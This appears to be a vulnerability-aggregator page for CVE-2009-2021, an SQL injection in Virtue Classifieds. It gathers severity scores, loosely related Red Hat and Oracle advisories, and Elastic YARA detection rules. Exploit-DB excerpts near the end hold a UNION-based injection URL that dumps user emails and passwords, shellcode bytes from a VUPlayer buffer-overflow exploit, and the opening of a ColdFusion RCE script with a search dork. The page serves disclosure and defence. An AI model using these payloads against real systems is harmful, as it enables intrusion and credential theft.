CVE-2009-2021
Published 2009-06-09
CVE-2009-2021: SQL injection vulnerability in search.php in Virtue Classifieds allows remote attackers to execute arbitrary SQL commands via the category parameter.
Priority: P3
CVSS 2.0: 7.5 (high)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.01% (58.8th percentile)
SQL injection vulnerability in search.php in Virtue Classifieds allows remote attackers to execute arbitrary SQL commands via the category parameter.
CVSS provenance
nvd: CVSS 2.0, 7.5 HIGH, vector AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat: 7.8 HIGH
vendor_oracle: 4.9 MEDIUM
GHSA
GHSA-wqrc-78gp-95rp: SQL injection vulnerability in search
ghsa_unreviewed·2022-05-02
CVE-2009-2021 [HIGH] CWE-89 GHSA-wqrc-78gp-95rp: SQL injection vulnerability in search
SQL injection vulnerability in search.php in Virtue Classifieds allows remote attackers to execute arbitrary SQL commands via the category parameter.
Red Hat
kernel: PCI: pciehp: Fix infinite loop in IRQ handler upon power fault
vendor_redhat·2024-06-20·CVSS 5.5
CVE-2021-47617 [MEDIUM] CWE-835 kernel: PCI: pciehp: Fix infinite loop in IRQ handler upon power fault
kernel: PCI: pciehp: Fix infinite loop in IRQ handler upon power fault
In the Linux kernel, the following vulnerability has been resolved:
PCI: pciehp: Fix infinite loop in IRQ handler upon power fault
The Power Fault Detected bit in the Slot Status register differs from
all other hotplug events in that it is sticky: It can only be cleared
after turning off slot power. Per PCIe r5.0, sec. 6.7.1.8:
If a power controller detects a main power fault on the hot-plug slot,
it must automatically set its internal main power fault latch [...].
The main power fault latch is cleared when software turns off power to
the hot-plug slot.
The stickiness used to cause interrupt storms and infinite loops which
were fixed in 2009 by commits 5651c48cfafe ("PCI pciehp: fix power fault
interrupt storm problem"
Red Hat
kernel: x86/hyperv: Fix NULL deref in set_hv_tscchange_cb() if Hyper-V setup fails
vendor_redhat·2024-04-10·CVSS 5.5
CVE-2021-47217 [MEDIUM] CWE-476 kernel: x86/hyperv: Fix NULL deref in set_hv_tscchange_cb() if Hyper-V setup fails
kernel: x86/hyperv: Fix NULL deref in set_hv_tscchange_cb() if Hyper-V setup fails
In the Linux kernel, the following vulnerability has been resolved:
x86/hyperv: Fix NULL deref in set_hv_tscchange_cb() if Hyper-V setup fails
Check for a valid hv_vp_index array prior to dereferencing hv_vp_index when
setting Hyper-V's TSC change callback. If Hyper-V setup failed in
hyperv_init(), the kernel will still report that it's running under
Hyper-V, but will have silently disabled nearly all functionality.
BUG: kernel NULL pointer dereference, address: 0000000000000010
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 0 P4D 0
Oops: 0000 [#1] SMP
CPU: 4 PID: 1 Comm: swapper/0 Not tainted 5.15.0-rc2+ #75
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0
Red Hat
kernel: btrfs: do not BUG_ON in link_to_fixup_dir
vendor_redhat·2024-03-25·CVSS 5.5
CVE-2021-47145 [MEDIUM] CWE-460 kernel: btrfs: do not BUG_ON in link_to_fixup_dir
kernel: btrfs: do not BUG_ON in link_to_fixup_dir
In the Linux kernel, the following vulnerability has been resolved:
btrfs: do not BUG_ON in link_to_fixup_dir
While doing error injection testing I got the following panic
kernel BUG at fs/btrfs/tree-log.c:1862!
invalid opcode: 0000 [#1] SMP NOPTI
CPU: 1 PID: 7836 Comm: mount Not tainted 5.13.0-rc1+ #305
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014
RIP: 0010:link_to_fixup_dir+0xd5/0xe0
RSP: 0018:ffffb5800180fa30 EFLAGS: 00010216
RAX: fffffffffffffffb RBX: 00000000fffffffb RCX: ffff8f595287faf0
RDX: ffffb5800180fa37 RSI: ffff8f5954978800 RDI: 0000000000000000
RBP: ffff8f5953af9450 R08: 0000000000000019 R09: 0000000000000001
R10: 000151f408682970 R11: 0000000120021001 R12: ffff8f5954978800
R13: ffff8f5952
Red Hat
kernel: tpm: efi: Use local variable for calculating final log size
vendor_redhat·2024-02-27·CVSS 5.5
CVE-2021-46951 [MEDIUM] CWE-191 kernel: tpm: efi: Use local variable for calculating final log size
kernel: tpm: efi: Use local variable for calculating final log size
In the Linux kernel, the following vulnerability has been resolved:
tpm: efi: Use local variable for calculating final log size
When tpm_read_log_efi is called multiple times, which happens when
one loads and unloads a TPM2 driver multiple times, then the global
variable efi_tpm_final_log_size will at some point become a negative
number due to the subtraction of final_events_preboot_size occurring
each time. Use a local variable to avoid this integer underflow.
The following issue is now resolved:
Mar 8 15:35:12 hibinst kernel: Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
Mar 8 15:35:12 hibinst kernel: Workqueue: tpm-vtpm vtpm_proxy_work [tpm_vtpm_proxy]
Mar 8 15:35:12 hibinst kernel: RIP: 001
Red Hat
mysql: Server: Security: Roles unspecified vulnerability (CPU Jan 2021)
vendor_redhat·2021-01-19·CVSS 4.9
CVE-2021-2009 [MEDIUM] mysql: Server: Security: Roles unspecified vulnerability (CPU Jan 2021)
mysql: Server: Security: Roles unspecified vulnerability (CPU Jan 2021)
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Roles). Supported versions that are affected are 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
Package: mysql (Red Hat Enterprise Linux 6) - Not affected
Package: mariadb (Red Hat Enterprise Linux 7) - Not affected
Package: mariadb:10.3/mariadb (Red Hat Enterprise
Oracle
Oracle Oracle MySQL Risk Matrix: Server: Security: Roles — CVE-2021-2009
vendor_oracle·2021-01-15·CVSS 4.9
CVE-2021-2009 [MEDIUM] Oracle Oracle MySQL Risk Matrix: Server: Security: Roles — CVE-2021-2009
Oracle Oracle MySQL Risk Matrix: Server: Security: Roles vulnerability
CVE: CVE-2021-2009
CVSS: 4.9
Protocol: MySQL Protocol
Remote exploit: No
Affected versions: Network
Advisory: cpujan2021 (JAN 2021)
YARA
Linux_Exploit_CVE_2009_2698_12374e97
yara·CVSS 7.8
CVE-2009-2698 [HIGH] Linux_Exploit_CVE_2009_2698_12374e97
rule Linux_Exploit_CVE_2009_2698_12374e97 {
    meta:
        author = "Elastic Security"
        id = "12374e97-385e-4b3a-9d50-39f35ad4f6dd"
        fingerprint = "2c669220ac8909e2336bbf9c38489c8e32d573ab6c29fa1e2e0c1fe69f7441ed"
        creation_date = "2021-01-12"
        last_modified = "2021-09-16"
        threat_name = "Linux.Exploit.CVE-2009-2698"
        reference_sample = "656fddc1bf4743a08a455628b6151076b81e604ff49c93d797fa49b1f7d09c2f"
        severity = 100
        arch_context = "x86"
        scan_context = "file, memory"
        license = "Elastic License v2"
        os = "linux"
    strings:
        $a = { 74 64 6F 75 74 00 66 77 72 69 74 65 00 64 65 73 63 00 63 76 65 00 }
    condition:
        all of them
}
YARA
Linux_Exploit_CVE_2009_2698_cc04dddd
yara·CVSS 7.8
CVE-2009-2698 [HIGH] Linux_Exploit_CVE_2009_2698_cc04dddd
rule Linux_Exploit_CVE_2009_2698_cc04dddd {
    meta:
        author = "Elastic Security"
        id = "cc04dddd-91d0-4c5f-a0ac-01787da7f369"
        fingerprint = "d3fdd66e486cb06bd63f6d8e471e66bc80990c4f0729eea16b47adc4cac80538"
        creation_date = "2021-04-06"
        last_modified = "2021-09-16"
        threat_name = "Linux.Exploit.CVE-2009-2698"
        reference_sample = "502b73ea04095e8a7ec4e8d7cc306242b45850ad28690156754beac8cd8d7b2d"
        severity = 100
        arch_context = "x86"
        scan_context = "file, memory"
        license = "Elastic License v2"
        os = "linux"
    strings:
        $a = { C4 10 89 45 F4 83 7D F4 FF 75 1F 83 EC 0C 68 }
    condition:
        all of them
}
YARA
Linux_Exploit_CVE_2009_2908_406c2fef
yara·CVSS 4.9
CVE-2009-2908 [MEDIUM] Linux_Exploit_CVE_2009_2908_406c2fef
rule Linux_Exploit_CVE_2009_2908_406c2fef {
    meta:
        author = "Elastic Security"
        id = "406c2fef-0f1a-441a-96b9-e4168c283c90"
        fingerprint = "94a94217823a8d682ba27889ba2b53fef7b18ae14d75a73456f21184e51581cf"
        creation_date = "2021-01-12"
        last_modified = "2021-09-16"
        threat_name = "Linux.Exploit.CVE-2009-2908"
        reference_sample = "1e05a23f5b3b9cfde183aec26b723147e1816b95dc0fb7f9ac57376efcb22fcd"
        severity = 100
        arch_context = "x86"
        scan_context = "file, memory"
        license = "Elastic License v2"
        os = "linux"
    strings:
        $a = { 74 00 66 70 72 69 6E 74 66 00 66 77 72 69 74 65 00 64 65 73 }
    condition:
        all of them
}
YARA
Linux_Exploit_CVE_2009_1897_6cf0a073
yara·CVSS 6.9
CVE-2009-1897 [MEDIUM] Linux_Exploit_CVE_2009_1897_6cf0a073
rule Linux_Exploit_CVE_2009_1897_6cf0a073 {
    meta:
        author = "Elastic Security"
        id = "6cf0a073-571e-48ef-be58-807bff1a5e97"
        fingerprint = "8fcb3687d4ec5dd467d937787f0659448a91446f92a476ff7ba471a02d6b07a9"
        creation_date = "2021-01-12"
        last_modified = "2021-09-16"
        threat_name = "Linux.Exploit.CVE-2009-1897"
        reference_sample = "85f371bf73ee6d8fcb6fa9a8a68b38c5e023151257fd549855c4c290cc340724"
        severity = 100
        arch_context = "x86"
        scan_context = "file, memory"
        license = "Elastic License v2"
        os = "linux"
    strings:
        $a = { 31 C0 85 DB 78 28 45 31 C9 41 89 D8 B9 02 00 00 00 BA 01 00 }
    condition:
        all of them
}
Exploit-DB
VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
exploitdb·2022-01-10·CVSS 8.8
CVE-2009-0182 [HIGH] VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
---
# Exploit Title: VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
# Date: 26/06/2021
# Exploit Author: Bryan Leong
# Vendor Homepage: http://www.vuplayer.com/
# Software Link: [Null]
# Version: VUPlayer 2.49
# Tested on: Windows 7 x64
# CVE : CVE-2009-0182
# VUPlayer 2.49 Local Buffer Overflow to Arbitrary Code Execution (Importing .wax playlist file) (Bypass DEP protection)
import struct
#shellcode
#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x1a" -f python
buf = b""
buf += b"\xd9\xea\xba\x33\x44\x3b\x11\xd9\x74\x24\xf4\x5d\x33"
buf += b"\xc9\xb1\x31\x83\xc5\x04\x31\x55\x14\x03\x55\x27\xa6"
buf += b"\xce\xed\xaf\xa4\x31\x0e\x2f\xc9\xb8\xeb\x1e\xc9\xdf"
buf += b"\x78\x30\xf9\x94\x2d\xbc\x72\xf8\xc5\x37\xf6\
Exploit-DB
Adobe ColdFusion 8 - Remote Command Execution (RCE)
exploitdb·2021-06-24·CVSS 7.5
CVE-2009-2265 [HIGH] Adobe ColdFusion 8 - Remote Command Execution (RCE)
Adobe ColdFusion 8 - Remote Command Execution (RCE)
---
# Exploit Title: Adobe ColdFusion 8 - Remote Command Execution (RCE)
# Google Dork: intext:"adobe coldfusion 8"
# Date: 24/06/2021
# Exploit Author: Pergyz
# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html
# Version: 8
# Tested on: Microsoft Windows Server 2008 R2 Standard
# CVE : CVE-2009-2265
#!/usr/bin/python3
from multiprocessing import Process
import io
import mimetypes
import os
import urllib.request
import uuid
class MultiPartForm:
def __init__(self):
self.files = []
self.boundary = uuid.uuid4().hex.encode('utf-8')
return
def get_content_type(self):
return 'multipart/form-data; boundary={}'.format(self.boundary.decode('utf-8'))
def add_file(self, fieldname, filename, fileHandle, mimetype=None)
Exploit-DB
Virtue Classifieds - 'category' SQL Injection
exploitdb·2009-06-08
CVE-2009-2021 Virtue Classifieds - 'category' SQL Injection
Virtue Classifieds - 'category' SQL Injection
---
#################################################################################################################################################
CMS : Virtue Classifieds
WEB : http://www.virtuenetz.com/classified/
File : search.php
Variable Type : GET
Value : category
Type : SQL Injection
Url : http:/www.site.com/search.php?category=[SQLI]
PoC:
http:/www.site.com/search.php?category=2+and+1=0+union+select+all+1,2,concat_ws(0x3A,email,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users--
Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.
100% CHILE
WWW.UNDERSECURITY.NET
############################################
No writeups or analysis indexed.
Published: 2009-06-09